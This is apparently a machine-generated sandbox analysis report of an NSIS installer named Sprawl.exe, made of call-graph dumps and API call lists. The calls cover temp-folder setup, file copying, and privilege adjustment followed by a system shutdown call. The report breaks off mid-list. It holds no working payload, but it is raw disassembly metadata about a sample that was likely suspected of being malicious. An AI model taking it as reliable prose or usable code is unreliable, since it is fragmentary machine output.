3229->3234 3233 40331f 3230->3233 3232 40336d 3240 4057cc CharNextA 3232->3240 3274 4033f3 3232->3274 3287 403403 3232->3287 3233->3227 3236 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3233->3236 3388 405d2f lstrcpynA 3234->3388 3238 4030de 12 API calls 3236->3238 3242 403351 3238->3242 3248 403388 3240->3248 3242->3227 3242->3287 3243 40353b 3246 403543 GetCurrentProcess OpenProcessToken 3243->3246 3247 4035bd ExitProcess 3243->3247 3244 40341d 3398 405525 3244->3398 3253 40358e 3246->3253 3254 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3246->3254 3250 403433 3248->3250 3251 4033ce 3248->3251 
3402 4054a8 3250->3402 3255 40588f 18 API calls 3251->3255 3257 4060c8 5 API calls 3253->3257 3254->3253 3259 4033d9 3255->3259 3258 403595 3257->3258 3261 4035aa ExitWindowsEx 3258->3261 3264 4035b6 3258->3264 3259->3287 3389 405d2f lstrcpynA 3259->3389 3261->3247 3261->3264 3262 403454 lstrcatA lstrcmpiA 3266 403470 3262->3266 3262->3287 3263 403449 lstrcatA 3263->3262 3269 40140b 2 API calls 3264->3269 3267 403475 3266->3267 3268 40347c 3266->3268 3405 40540e CreateDirectoryA 3267->3405 3410 40548b CreateDirectoryA 3268->3410 3269->3247 3270 4033e8 3390 405d2f lstrcpynA 3270->3390 3332 4036af 3274->3332 3276 403481 SetCurrentDirectoryA 3277 403490 3276->3277 3278 40349b 3276->3278 3413 405d2f lstrcpynA 3277->3413 3414 405d2f lstrcpynA 3278->3414 3281 405d51 18 API calls 3282 4034da DeleteFileA 3281->3282 3283 4034e7 CopyFileA 3282->3283 3289 4034a9 3282->3289 3283->3289 3284 40352f 3286 405bea 38 API calls 3284->3286 3285 405bea 38 API calls 3285->3289 3286->3287 3391 4035d5 3287->3391 3288 405d51 18 API calls 3288->3289 3289->3281 3289->3284 3289->3285 3289->3288 3290 4054c0 2 API calls 3289->3290 3291 40351b CloseHandle 3289->3291 3290->3289 3291->3289 3292->3216 3293->3218 3295 405f9a 5 API calls 3294->3295 3296 4030ea 3295->3296 3297 4030f4 3296->3297 3298 4057a1 3 API calls 3296->3298 3297->3225 3299 4030fc 3298->3299 3300 40548b 2 API calls 3299->3300 3301 403102 3300->3301 3415 4059d1 3301->3415 3419 4059a2 GetFileAttributesA CreateFileA 3304->3419 3306 402ca6 3327 402cb6 3306->3327 3420 405d2f lstrcpynA 3306->3420 3308 402ccc 3309 4057e8 2 API calls 3308->3309 3310 402cd2 3309->3310 3421 405d2f lstrcpynA 3310->3421 3312 402cdd GetFileSize 3313 402dd9 3312->3313 3325 402cf4 3312->3325 3422 402c02 3313->3422 3315 402de2 3317 402e12 GlobalAlloc 3315->3317 3315->3327 3434 4030c7 SetFilePointer 3315->3434 3316 4030b1 ReadFile 3316->3325 3433 4030c7 SetFilePointer 3317->3433 3319 402e45 3323 402c02 6 API calls 3319->3323 3321 402dfb 3324 4030b1 ReadFile 
3321->3324 3322 402e2d 3326 402e9f 32 API calls 3322->3326 3323->3327 3328 402e06 3324->3328 3325->3313 3325->3316 3325->3319 3325->3327 3329 402c02 6 API calls 3325->3329 3330 402e39 3326->3330 3327->3232 3328->3317 3328->3327 3329->3325 3330->3327 3330->3330 3331 402e76 SetFilePointer 3330->3331 3331->3327 3333 4060c8 5 API calls 3332->3333 3334 4036c3 3333->3334 3335 4036c9 3334->3335 3336 4036db 3334->3336 3444 405c8d wsprintfA 3335->3444 3337 405c16 3 API calls 3336->3337 3338 403706 3337->3338 3340 403724 lstrcatA 3338->3340 3341 405c16 3 API calls 3338->3341 3342 4036d9 3340->3342 3341->3340 3435 403974 3342->3435 3345 40588f 18 API calls 3346 403756 3345->3346 3347 4037df 3346->3347 3349 405c16 3 API calls 3346->3349 3348 40588f 18 API calls 3347->3348 3350 4037e5 3348->3350 3351 403782 3349->3351 3352 4037f5 LoadImageA 3350->3352 3353 405d51 18 API calls 3350->3353 3351->3347 3359 40379e lstrlenA 3351->3359 3363 4057cc CharNextA 3351->3363 3354 40389b 3352->3354 3355 40381c RegisterClassA 3352->3355 3353->3352 3358 40140b 2 API calls 3354->3358 3356 403852 SystemParametersInfoA CreateWindowExA 3355->3356 3357 4038a5 3355->3357 3356->3354 3357->3287 3362 4038a1 3358->3362 3360 4037d2 3359->3360 3361 4037ac lstrcmpiA 3359->3361 3365 4057a1 3 API calls 3360->3365 3361->3360 3364 4037bc GetFileAttributesA 3361->3364 3362->3357 3368 403974 19 API calls 3362->3368 3366 40379c 3363->3366 3367 4037c8 3364->3367 3369 4037d8 3365->3369 3366->3359 3367->3360 3370 4057e8 2 API calls 3367->3370 3371 4038b2 3368->3371 3445 405d2f lstrcpynA 3369->3445 3370->3360 3373 403941 3371->3373 3374 4038be ShowWindow 3371->3374 3446 40501a OleInitialize 3373->3446 3376 40605a 3 API calls 3374->3376 3378 4038d6 3376->3378 3377 403947 3379 403963 3377->3379 3380 40394b 3377->3380 3381 4038e4 GetClassInfoA 3378->3381 3383 40605a 3 API calls 3378->3383 3382 40140b 2 API calls 3379->3382 3380->3357 3387 40140b 2 API calls 3380->3387 3384 4038f8 GetClassInfoA RegisterClassA 3381->3384 
3385 40390e DialogBoxParamA 3381->3385 3382->3357 3383->3381 3384->3385 3386 40140b 2 API calls 3385->3386 3386->3357 3387->3357 3388->3223 3389->3270 3390->3274 3392 4035ed 3391->3392 3393 4035df CloseHandle 3391->3393 3454 40361a 3392->3454 3393->3392 3396 4055d1 69 API calls 3397 40340c OleUninitialize 3396->3397 3397->3243 3397->3244 3399 40553a 3398->3399 3400 40342b ExitProcess 3399->3400 3401 40554e MessageBoxIndirectA 3399->3401 3401->3400 3403 4060c8 5 API calls 3402->3403 3404 403438 lstrcatA 3403->3404 3404->3262 3404->3263 3406 40347a 3405->3406 3407 40545f GetLastError 3405->3407 3406->3276 3407->3406 3408 40546e SetFileSecurityA 3407->3408 3408->3406 3409 405484 GetLastError 3408->3409 3409->3406 3411 40549b 3410->3411 3412 40549f GetLastError 3410->3412 3411->3276 3412->3411 3413->3278 3414->3289 3416 4059dc GetTickCount GetTempFileNameA 3415->3416 3417 40310d 3416->3417 3418 405a09 3416->3418 3417->3225 3418->3416 3418->3417 3419->3306 3420->3308 3421->3312 3423 402c23 3422->3423 3424 402c0b 3422->3424 3427 402c33 GetTickCount 3423->3427 3428 402c2b 3423->3428 3425 402c14 DestroyWindow 3424->3425 3426 402c1b 3424->3426 3425->3426 3426->3315 3430 402c41 CreateDialogParamA ShowWindow 3427->3430 3431 402c64 3427->3431 3429 406104 2 API calls 3428->3429 3432 402c31 3429->3432 3430->3431 3431->3315 3432->3315 3433->3322 3434->3321 3436 403988 3435->3436 3453 405c8d wsprintfA 3436->3453 3438 4039f9 3439 405d51 18 API calls 3438->3439 3440 403a05 SetWindowTextA 3439->3440 3441 403a21 3440->3441 3442 403734 3440->3442 3441->3442 3443 405d51 18 API calls 3441->3443 3442->3345 3443->3441 3444->3342 3445->3347 3447 403f60 SendMessageA 3446->3447 3451 40503d 3447->3451 3448 405064 3449 403f60 SendMessageA 3448->3449 3450 405076 OleUninitialize 3449->3450 3450->3377 3451->3448 3452 401389 2 API calls 3451->3452 3452->3451 3453->3438 3455 403628 3454->3455 3456 40362d FreeLibrary GlobalFree 3455->3456 3457 4035f2 3455->3457 3456->3456 3456->3457 3457->3396 3458 
402410 3459 402b44 19 API calls 3458->3459 3460 40241a 3459->3460 3461 402a3a 18 API calls 3460->3461 3462 402423 3461->3462 3463 40242d RegQueryValueExA 3462->3463 3466 4026a6 3462->3466 3464 402453 RegCloseKey 3463->3464 3465 40244d 3463->3465 3464->3466 3465->3464 3469 405c8d wsprintfA 3465->3469 3469->3464 3470 401f90 3471 401fa2 3470->3471 3481 402050 3470->3481 3472 402a3a 18 API calls 3471->3472 3473 401fa9 3472->3473 3475 402a3a 18 API calls 3473->3475 3474 401423 25 API calls 3476 4021c9 3474->3476 3477 401fb2 3475->3477 3478 401fc7 LoadLibraryExA 3477->3478 3479 401fba GetModuleHandleA 3477->3479 3480 401fd7 GetProcAddress 3478->3480 3478->3481 3479->3478 3479->3480 3482 402023 3480->3482 3483 401fe6 3480->3483 3481->3474 3484 404f48 25 API calls 3482->3484 3486 401ff6 3483->3486 3488 401423 3483->3488 3484->3486 3486->3476 3487 402044 FreeLibrary 3486->3487 3487->3476 3489 404f48 25 API calls 3488->3489 3490 401431 3489->3490 3490->3486 4023 401490 4024 404f48 25 API calls 4023->4024 4025 401497 4024->4025 3627 401595 3628 402a3a 18 API calls 3627->3628 3629 40159c SetFileAttributesA 3628->3629 3630 4015ae 3629->3630 4026 402616 4027 40261d 4026->4027 4028 40287c 4026->4028 4029 402a1d 18 API calls 4027->4029 4030 402628 4029->4030 4031 40262f SetFilePointer 4030->4031 4031->4028 4032 40263f 4031->4032 4034 405c8d wsprintfA 4032->4034 4034->4028 4035 401717 4036 402a3a 18 API calls 4035->4036 4037 40171e SearchPathA 4036->4037 4038 401739 4037->4038 4039 402519 4040 40252e 4039->4040 4041 40251e 4039->4041 4043 402a3a 18 API calls 4040->4043 4042 402a1d 18 API calls 4041->4042 4044 402527 4042->4044 4045 402535 lstrlenA 4043->4045 4046 405a49 WriteFile 4044->4046 4047 402557 4044->4047 4045->4044 4046->4047 4048 40149d 4049 4014ab PostQuitMessage 4048->4049 4050 40226e 4048->4050 4049->4050 4051 4046a3 4052 4046b3 4051->4052 4053 4046cf 4051->4053 4062 405509 GetDlgItemTextA 4052->4062 4055 404702 4053->4055 4056 4046d5 SHGetPathFromIDListA 4053->4056 
4058 4046e5 4056->4058 4061 4046ec SendMessageA 4056->4061 4057 4046c0 SendMessageA 4057->4053 4059 40140b 2 API calls 4058->4059 4059->4061 4061->4055 4062->4057 4063 401ca7 4064 402a1d 18 API calls 4063->4064 4065 401cae 4064->4065 4066 402a1d 18 API calls 4065->4066 4067 401cb6 GetDlgItem 4066->4067 4068 402513 4067->4068 4069 404028 lstrcpynA lstrlenA 3076 40192a 3077 40192c 3076->3077 3078 402a3a 18 API calls 3077->3078 3079 401931 3078->3079 3082 4055d1 3079->3082 3122 40588f 3082->3122 3085 405610 3088 405748 3085->3088 3136 405d2f lstrcpynA 3085->3136 3086 4055f9 DeleteFileA 3087 40193a 3086->3087 3088->3087 3154 406033 FindFirstFileA 3088->3154 3090 405636 3091 405649 3090->3091 3092 40563c lstrcatA 3090->3092 3137 4057e8 lstrlenA 3091->3137 3094 40564f 3092->3094 3097 40565d lstrcatA 3094->3097 3099 405668 lstrlenA FindFirstFileA 3094->3099 3097->3099 3098 405766 3157 4057a1 lstrlenA CharPrevA 3098->3157 3100 40573e 3099->3100 3120 40568c 3099->3120 3100->3088 3102 4057cc CharNextA 3102->3120 3104 405589 5 API calls 3105 405778 3104->3105 3106 405792 3105->3106 3107 40577c 3105->3107 3108 404f48 25 API calls 3106->3108 3107->3087 3112 404f48 25 API calls 3107->3112 3108->3087 3109 40571d FindNextFileA 3111 405735 FindClose 3109->3111 3109->3120 3111->3100 3113 405789 3112->3113 3115 405bea 38 API calls 3113->3115 3116 405790 3115->3116 3116->3087 3117 4055d1 62 API calls 3117->3120 3118 404f48 25 API calls 3118->3109 3119 404f48 25 API calls 3119->3120 3120->3102 3120->3109 3120->3117 3120->3118 3120->3119 3141 405d2f lstrcpynA 3120->3141 3142 405589 3120->3142 3150 405bea MoveFileExA 3120->3150 3160 405d2f lstrcpynA 3122->3160 3124 4058a0 3161 40583a CharNextA CharNextA 3124->3161 3127 4055f1 3127->3085 3127->3086 3128 405f9a 5 API calls 3134 4058b6 3128->3134 3129 4058e1 lstrlenA 3130 4058ec 3129->3130 3129->3134 3132 4057a1 3 API calls 3130->3132 3131 406033 2 API calls 3131->3134 3133 4058f1 GetFileAttributesA 3132->3133 3133->3127 3134->3127 
3134->3129 3134->3131 3135 4057e8 2 API calls 3134->3135 3135->3129 3136->3090 3138 4057f5 3137->3138 3139 405806 3138->3139 3140 4057fa CharPrevA 3138->3140 3139->3094 3140->3138 3140->3139 3141->3120 3167 40597d GetFileAttributesA 3142->3167 3145 4055a4 RemoveDirectoryA 3147 4055b2 3145->3147 3146 4055ac DeleteFileA 3146->3147 3148 4055b6 3147->3148 3149 4055c2 SetFileAttributesA 3147->3149 3148->3120 3149->3148 3151 405c0b 3150->3151 3152 405bfe 3150->3152 3151->3120 3170 405a78 lstrcpyA 3152->3170 3155 405762 3154->3155 3156 406049 FindClose 3154->3156 3155->3087 3155->3098 3156->3155 3158 40576c 3157->3158 3159 4057bb lstrcatA 3157->3159 3158->3104 3159->3158 3160->3124 3162 405855 3161->3162 3165 405865 3161->3165 3163 405860 CharNextA 3162->3163 3162->3165 3166 405885 3163->3166 3164 4057cc CharNextA 3164->3165 3165->3164 3165->3166 3166->3127 3166->3128 3168 405595 3167->3168 3169 40598f SetFileAttributesA 3167->3169 3168->3145 3168->3146 3168->3148 3169->3168 3171 405aa0 3170->3171 3172 405ac6 GetShortPathNameA 3170->3172 3197 4059a2 GetFileAttributesA CreateFileA 3171->3197 3174 405be5 3172->3174 3175 405adb 3172->3175 3174->3151 3175->3174 3177 405ae3 wsprintfA 3175->3177 3176 405aaa CloseHandle GetShortPathNameA 3176->3174 3179 405abe 3176->3179 3178 405d51 18 API calls 3177->3178 3180 405b0b 3178->3180 3179->3172 3179->3174 3198 4059a2 GetFileAttributesA CreateFileA 3180->3198 3182 405b18 3182->3174 3183 405b27 GetFileSize GlobalAlloc 3182->3183 3184 405b49 3183->3184 3185 405bde CloseHandle 3183->3185 3186 405a1a ReadFile 3184->3186 3185->3174 3187 405b51 3186->3187 3187->3185 3199 405907 lstrlenA 3187->3199 3190 405b68 lstrcpyA 3193 405b8a 3190->3193 3191 405b7c 3192 405907 4 API calls 3191->3192 3192->3193 3194 405bc1 SetFilePointer 3193->3194 3195 405a49 WriteFile 3194->3195 3196 405bd7 GlobalFree 3195->3196 3196->3185 3197->3176 3198->3182 3200 405948 lstrlenA 3199->3200 3201 405950 3200->3201 3202 405921 lstrcmpiA 3200->3202 3201->3190 3201->3191 
3202->3201 3203 40593f CharNextA 3202->3203 3203->3200 4070 4028aa SendMessageA 4071 4028c4 InvalidateRect 4070->4071 4072 4028cf 4070->4072 4071->4072 3607 4015b3 3608 402a3a 18 API calls 3607->3608 3609 4015ba 3608->3609 3610 40583a 4 API calls 3609->3610 3624 4015c2 3610->3624 3611 40161c 3613 401621 3611->3613 3614 40164a 3611->3614 3612 4057cc CharNextA 3612->3624 3615 401423 25 API calls 3613->3615 3617 401423 25 API calls 3614->3617 3616 401628 3615->3616 3626 405d2f lstrcpynA 3616->3626 3623 401642 3617->3623 3618 40548b 2 API calls 3618->3624 3620 4054a8 5 API calls 3620->3624 3621 401633 SetCurrentDirectoryA 3621->3623 3622 401604 GetFileAttributesA 3622->3624 3624->3611 3624->3612 3624->3618 3624->3620 3624->3622 3625 40540e 4 API calls 3624->3625 3625->3624 3626->3621 4073 4016b3 4074 402a3a 18 API calls 4073->4074 4075 4016b9 GetFullPathNameA 4074->4075 4076 4016d0 4075->4076 4077 4016f1 4075->4077 4076->4077 4080 406033 2 API calls 4076->4080 4078 401705 GetShortPathNameA 4077->4078 4079 4028cf 4077->4079 4078->4079 4081 4016e1 4080->4081 4081->4077 4083 405d2f lstrcpynA 4081->4083 4083->4077 4084 4014b7 4085 4014bd 4084->4085 4086 401389 2 API calls 4085->4086 4087 4014c5 4086->4087 4088 401d38 GetDC GetDeviceCaps 4089 402a1d 18 API calls 4088->4089 4090 401d56 MulDiv ReleaseDC 4089->4090 4091 402a1d 18 API calls 4090->4091 4092 401d75 4091->4092 4093 405d51 18 API calls 4092->4093 4094 401dae CreateFontIndirectA 4093->4094 4095 402513 4094->4095 3631 404ebc 3632 404ee0 3631->3632 3633 404ecc 3631->3633 3636 404ee8 IsWindowVisible 3632->3636 3643 404f08 3632->3643 3634 404ed2 3633->3634 3635 404f29 3633->3635 3638 403f60 SendMessageA 3634->3638 3637 404f2e CallWindowProcA 3635->3637 3636->3635 3639 404ef5 3636->3639 3640 404edc 3637->3640 3638->3640 3641 404813 5 API calls 3639->3641 3642 404eff 3641->3642 3642->3643 3643->3637 3644 404893 4 API calls 3643->3644 3644->3635 3645 40173e 3646 402a3a 18 API calls 3645->3646 3647 401745 3646->3647 3648 
4059d1 2 API calls 3647->3648 3649 40174c 3648->3649 3650 4059d1 2 API calls 3649->3650 3650->3649 4096 401ebe 4097 402a3a 18 API calls 4096->4097 4098 401ec5 4097->4098 4099 406033 2 API calls 4098->4099 4100 401ecb 4099->4100 4102 401edd 4100->4102 4103 405c8d wsprintfA 4100->4103 4103->4102 4104 40193f 4105 402a3a 18 API calls 4104->4105 4106 401946 lstrlenA 4105->4106 4107 402513 4106->4107

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 8 403150 1->8 4 40315c-40316f call 40605a lstrlenA 2->4 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 4->9 8->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 36 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->36 37 403359-403373 DeleteFileA call 402c66 27->37 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 47 4032c9 31->47 34 403234-40323a 32->34 35 40324a-403277 32->35 39 403240 34->39 40 40323c-40323e 34->40 41 403279-40327f 35->41 42 40328a-4032b8 35->42 36->37 55 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 36->55 52 403407-403417 call 4035d5 OleUninitialize 37->52 53 403379-40337f 37->53 39->35 40->35 40->39 48 403281-403283 41->48 49 403285 41->49 42->31 51 4032d6-4032e2 call 405d2f 42->51 47->22 48->42 48->49 49->42 51->27 66 40353b-403541 52->66 67 40341d-40342d call 405525 ExitProcess 52->67 56 403381-40338c call 4057cc 53->56 57 4033f7-4033fe call 4036af 53->57 55->37 55->52 68 4033c2-4033cc 56->68 69 40338e-4033b7 56->69 64 403403 57->64 64->52 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 76 403433-403447 call 4054a8 lstrcatA 68->76 77 4033ce-4033db call 40588f 68->77 73 4033b9-4033bb 69->73 79 40358e-40359c call 4060c8 71->79 80 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035c7 72->74 75 4035cb-4035cf ExitProcess 72->75 73->68 81 4033bd-4033c0 73->81 74->75 91 
403454-40346e lstrcatA lstrcmpiA 76->91 92 403449-40344f lstrcatA 76->92 77->52 90 4033dd-4033f3 call 405d2f * 2 77->90 88 4035aa-4035b4 ExitWindowsEx 79->88 89 40359e-4035a8 79->89 80->79 81->68 81->73 88->72 93 4035b6-4035b8 call 40140b 88->93 89->88 89->93 90->57 91->52 95 403470-403473 91->95 92->91 93->72 96 403475-40347a call 40540e 95->96 97 40347c call 40548b 95->97 106 403481-40348e SetCurrentDirectoryA 96->106 97->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 117 40352f-403536 call 405bea 115->117 116->115 118 4034f9-403519 call 405bea call 405d51 call 4054c0 116->118 117->52 118->115 127 40351b-403522 CloseHandle 118->127 127->115
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                                            • GetVersion.KERNEL32 ref: 0040313A
                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                                            • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                                            • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                                            • GetCommandLineA.KERNEL32(Vulkanbyernes Setup,NSIS Error), ref: 004031BD
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Sprawl.exe",00000000), ref: 004031D0
                                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Sprawl.exe",00000020), ref: 004031FB
                                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                            • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                                            • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                                              • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                            • String ID: "$"C:\Users\user\Desktop\Sprawl.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Desktop$C:\Users\user\Desktop\Sprawl.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vulkanbyernes Setup$\Temp$`K$v$~nsu
                                                                                                                            • API String ID: 3329125770-2255513630
                                                                                                                            • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                                                            • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                                            • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                                                            • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 128 4048c5-404911 GetDlgItem * 2 129 404b31-404b38 128->129 130 404917-4049ab GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404b3a-404b4a 129->131 132 404b4c 129->132 133 4049ba-4049c1 DeleteObject 130->133 134 4049ad-4049b8 SendMessageA 130->134 135 404b4f-404b58 131->135 132->135 136 4049c3-4049cb 133->136 134->133 137 404b63-404b69 135->137 138 404b5a-404b5d 135->138 139 4049f4-4049f8 136->139 140 4049cd-4049d0 136->140 145 404b78-404b7f 137->145 146 404b6b-404b72 137->146 138->137 142 404c47-404c4e 138->142 139->136 141 4049fa-404a26 call 403f14 * 2 139->141 143 4049d2 140->143 144 4049d5-4049f2 call 405d51 SendMessageA * 2 140->144 184 404af0-404b03 GetWindowLongA SetWindowLongA 141->184 185 404a2c-404a32 141->185 151 404c50-404c56 142->151 152 404cbf-404cc7 142->152 143->144 144->139 148 404b81-404b84 145->148 149 404bf4-404bf7 145->149 146->142 146->145 157 404b86-404b8d 148->157 158 404b8f-404ba4 call 404813 148->158 149->142 153 404bf9-404c03 149->153 160 404ea7-404eb9 call 403f7b 151->160 161 404c5c-404c66 151->161 155 404cd1-404cd8 152->155 156 404cc9-404ccf SendMessageA 152->156 163 404c13-404c1d 153->163 164 404c05-404c11 SendMessageA 153->164 165 404cda-404ce1 155->165 166 404d0c-404d13 155->166 156->155 157->149 157->158 158->149 183 404ba6-404bb7 158->183 161->160 169 404c6c-404c7b SendMessageA 161->169 163->142 171 404c1f-404c29 163->171 164->163 172 404ce3-404ce4 ImageList_Destroy 165->172 173 404cea-404cf1 165->173 176 404e69-404e70 166->176 177 404d19-404d25 call 4011ef 166->177 169->160 178 404c81-404c92 SendMessageA 169->178 179 404c3a-404c44 171->179 180 404c2b-404c38 171->180 172->173 181 404cf3-404cf4 GlobalFree 173->181 182 404cfa-404d06 173->182 176->160 189 404e72-404e79 176->189 202 404d35-404d38 177->202 203 404d27-404d2a 177->203 187 
404c94-404c9a 178->187 188 404c9c-404c9e 178->188 179->142 180->142 181->182 182->166 183->149 191 404bb9-404bbb 183->191 190 404b09-404b0d 184->190 192 404a35-404a3b 185->192 187->188 194 404c9f-404cb8 call 401299 SendMessageA 187->194 188->194 189->160 195 404e7b-404ea5 ShowWindow GetDlgItem ShowWindow 189->195 196 404b27-404b2f call 403f49 190->196 197 404b0f-404b22 ShowWindow call 403f49 190->197 198 404bbd-404bc4 191->198 199 404bce 191->199 200 404ad1-404ae4 192->200 201 404a41-404a69 192->201 194->152 195->160 196->129 197->160 210 404bc6-404bc8 198->210 211 404bca-404bcc 198->211 214 404bd1-404bed call 40117d 199->214 200->192 205 404aea-404aee 200->205 212 404aa3-404aa5 201->212 213 404a6b-404aa1 SendMessageA 201->213 206 404d79-404d9d call 4011ef 202->206 207 404d3a-404d53 call 4012e2 call 401299 202->207 215 404d2c 203->215 216 404d2d-404d30 call 404893 203->216 205->184 205->190 230 404da3 206->230 231 404e3f-404e53 InvalidateRect 206->231 236 404d63-404d72 SendMessageA 207->236 237 404d55-404d5b 207->237 210->214 211->214 218 404aa7-404ab6 SendMessageA 212->218 219 404ab8-404ace SendMessageA 212->219 213->200 214->149 215->216 216->202 218->200 219->200 234 404da6-404db1 230->234 231->176 233 404e55-404e64 call 4047e6 call 4047ce 231->233 233->176 238 404db3-404dc2 234->238 239 404e27-404e39 234->239 236->206 242 404d5d 237->242 243 404d5e-404d61 237->243 240 404dc4-404dd1 238->240 241 404dd5-404dd8 238->241 239->231 239->234 240->241 245 404dda-404ddd 241->245 246 404ddf-404de8 241->246 242->243 243->236 243->237 248 404ded-404e25 SendMessageA * 2 245->248 246->248 249 404dea 246->249 248->239 249->248
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                                            • LoadBitmapA.USER32(0000006E), ref: 00404945
